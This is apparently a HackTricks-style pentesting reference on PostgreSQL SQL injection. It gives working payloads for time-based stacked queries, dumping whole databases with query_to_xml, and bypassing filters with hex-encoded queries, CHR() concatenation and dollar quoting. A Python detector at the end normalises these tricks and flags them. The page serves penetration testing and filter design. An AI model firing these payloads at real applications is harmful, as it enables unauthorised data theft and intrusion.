PostgreSQL injection



This page aims to explain different tricks that could help you exploit a SQL injection found in a PostgreSQL database, and to complement the tricks you can find on https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md

Network Interaction - Privilege Escalation, Port Scanner, NTLM challenge response disclosure & Exfiltration

The PostgreSQL module dblink offers capabilities for connecting to other PostgreSQL instances and opening TCP connections. These features, combined with the COPY FROM functionality, enable actions like privilege escalation, port scanning, and NTLM challenge response capture. For detailed methods on carrying out these attacks, check the dedicated page on how to perform them.

You can read this example to see a CTF write-up of how to load data inside large objects and then exfiltrate the content of those large objects inside the username parameter of the function dblink_connect.

PostgreSQL Attacks: Read/write, RCE, privesc

Check how to compromise the host and escalate privileges from PostgreSQL in:

5432,5433 - Pentesting Postgresql

WAF bypass

PostgreSQL String functions

Manipulating strings could help you bypass WAFs or other restrictions. In this page you can find some useful string functions.

Stacked Queries

Remember that PostgreSQL supports stacked queries, but several applications will throw an error if 2 responses are returned when expecting just 1. However, you can still abuse stacked queries via time-based injection:

id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -

XML tricks

query_to_xml

This function will return all the data in XML format in just one file. It is ideal if you want to dump a lot of data in just one row:

SELECT query_to_xml('select * from pg_user',true,true,'');

database_to_xml

This function will dump the whole database in XML format in just 1 row (be careful if the database is very large as you may DoS it or even your own client):

SELECT database_to_xml(true,true,'');

Strings in Hex

If you can run queries by passing them inside a string (for example using the query_to_xml function), you can use convert_from to pass the string as hex and bypass filters this way:

select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');

# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h

# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -

Forbidden quotes

If you cannot use quotes in your payload you could bypass this with CHR for basic clauses (character concatenation only works in basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements):

SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);

Or with $. These queries return the same results:

SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
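From the defender's side, the three quoting and encoding tricks above (hex literals fed to convert_from, CHR() concatenation, and dollar quoting) all hide the same plain SQL from a naive filter. The following Python is an added example, not code from this page or from HackTricks: it undoes those encodings and then flags the functions and the stacked-query pattern this page relies on. The sample lines are constructed from the page's own payloads.

```python
import re

# Functions the tricks on this page lean on; seeing them in application
# traffic is a strong signal of injection.
SUSPICIOUS_FUNCS = ("pg_sleep", "query_to_xml", "database_to_xml",
                    "dblink", "convert_from")

def decode_hex_literals(sql: str) -> str:
    """Replace '\\x...' hex string literals with their UTF-8 text."""
    def repl(m):
        try:
            return "'" + bytes.fromhex(m.group(1)).decode("utf-8") + "'"
        except ValueError:
            return m.group(0)  # not valid hex/UTF-8: leave untouched
    return re.sub(r"'\\x([0-9a-fA-F]+)'", repl, sql)

def fold_chr_concat(sql: str) -> str:
    """Collapse CHR(65) || CHR(87) ... into the quoted string it builds."""
    run = re.compile(r"(?:chr\(\s*\d+\s*\)\s*(?:\|\|\s*)?)+", re.I)
    def repl(m):
        codes = re.findall(r"chr\(\s*(\d+)\s*\)", m.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return run.sub(repl, sql)

def unquote_dollar_strings(sql: str) -> str:
    """Turn $$text$$ and $TAG$text$TAG$ into 'text'."""
    return re.sub(r"\$([A-Za-z_]*)\$(.*?)\$\1\$", r"'\2'", sql, flags=re.S)

def normalize(sql: str) -> str:
    """Undo the three encodings so a filter rule sees plain SQL."""
    return unquote_dollar_strings(fold_chr_concat(decode_hex_literals(sql)))

def analyze(sql: str) -> dict:
    """Return the normalized statement and the indicators found in it."""
    norm = normalize(sql)
    low = norm.lower()
    return {
        "normalized": norm,
        "functions": [f for f in SUSPICIOUS_FUNCS if f in low],
        "stacked": re.search(r";\s*select\b", low) is not None,
    }

# Constructed sample lines, taken from the payloads shown on this page.
SAMPLES = [
    "id=1; select pg_sleep(10);-- -",
    "SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);",
    "SELECT $TAG$hacktricks$TAG$;",
    ";select query_to_xml(convert_from('\\x73656c6563742031','UTF8'),true,true,'')-- -",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze(s))
```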
